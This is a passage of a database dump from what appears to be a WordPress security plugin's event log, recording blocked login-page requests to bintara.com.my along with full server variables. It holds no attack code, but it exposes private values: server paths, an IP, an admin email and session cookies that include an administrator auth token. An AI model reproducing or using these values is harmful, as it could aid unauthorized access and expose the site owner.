br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=20efbd90916fb2c0b8172e46e26f2b71\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"337-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/wp-login\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/wp-login\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYghhBvUhDgROhmDVGmTzAAAAAE\";s:12:\"REDIRECT_URL\";s:9:\"/wp-login\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"51509\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/wp-login\";s:10:\"SCRIPT_URL\";s:9:\"/wp-login\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYghhBvUhDgROhmDVGmTzAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569202564.9161\";s:12:\"REQUEST_TIME\";s:10:\"1569202564\";}}','notice','2019-09-23 01:36:06','2019-09-23 01:36:05',30766160,32573824,'https://bintara.com.my/wp-login',1,0,'175.139.174.69'),(26833,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:66:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"5\";s:13:\"H2_STREAM_TAG\";s:4:\"21-5\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=20efbd90916fb2c0b8172e46e26f2b71\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"5\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"21-5\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYghodgT8SLwZ2vcJZwQmAAAAAU\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYghodgT8SLwZ2vcJZwQmAAAAAU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"51522\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYghodgT8SLwZ2vcJZwQmAAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569202593.6021\";s:12:\"REQUEST_TIME\";s:10:\"1569202593\";}}','notice','2019-09-23 01:36:35','2019-09-23 01:36:34',30770560,32586248,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'175.139.174.69'),(26834,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:5:\"323-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=20efbd90916fb2c0b8172e46e26f2b71\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"3\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"323-3\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYghtBvUhDgROhmDVGmT0wAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYghtBvUhDgROhmDVGmT0wAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"51534\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYghtBvUhDgROhmDVGmT0wAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569202612.6128\";s:12:\"REQUEST_TIME\";s:10:\"1569202612\";}}','notice','2019-09-23 01:36:54','2019-09-23 01:36:52',30766848,32579776,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'175.139.174.69'),(26835,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:5:\"461-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:367:\"wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7Cae037e399c581499e00dd73a9fb4f3c00deaa9417933930059c63a26947e5432; icwp-wpsf=6dc30aa3a01585fd8b7df7cf49f54d2f; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D0%26editor_plain_text_paste_warning%3D1; wp-settings-time-1=1569201372\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"3\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"461-3\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYgiErp66oO1SlzUVT6MmgAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYgiErp66oO1SlzUVT6MmgAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"51561\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgiErp66oO1SlzUVT6MmgAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1569202706.98\";s:12:\"REQUEST_TIME\";s:10:\"1569202706\";}}','notice','2019-09-23 01:38:28','2019-09-23 01:38:27',30733504,32547640,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'175.139.174.69'),(26836,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:66:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"5\";s:13:\"H2_STREAM_TAG\";s:4:\"65-5\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:367:\"wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7Cae037e399c581499e00dd73a9fb4f3c00deaa9417933930059c63a26947e5432; icwp-wpsf=6dc30aa3a01585fd8b7df7cf49f54d2f; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D0%26editor_plain_text_paste_warning%3D1; wp-settings-time-1=1569201372\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"5\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"65-5\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYgiIzXwAkGgnPePZ3HIbQAAAAU\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYgiIzXwAkGgnPePZ3HIbQAAAAU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"51568\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgiIzXwAkGgnPePZ3HIbQAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569202723.2022\";s:12:\"REQUEST_TIME\";s:10:\"1569202723\";}}','notice','2019-09-23 01:38:45','2019-09-23 01:38:43',30737656,32548464,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'175.139.174.69'),(26837,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:5:\"466-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:367:\"wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7Cae037e399c581499e00dd73a9fb4f3c00deaa9417933930059c63a26947e5432; icwp-wpsf=6dc30aa3a01585fd8b7df7cf49f54d2f; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D0%26editor_plain_text_paste_warning%3D1; wp-settings-time-1=1569201372\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"3\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"466-3\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYgiUrp66oO1SlzUVT6MqgAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYgiUrp66oO1SlzUVT6MqgAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"51579\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgiUrp66oO1SlzUVT6MqgAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"15692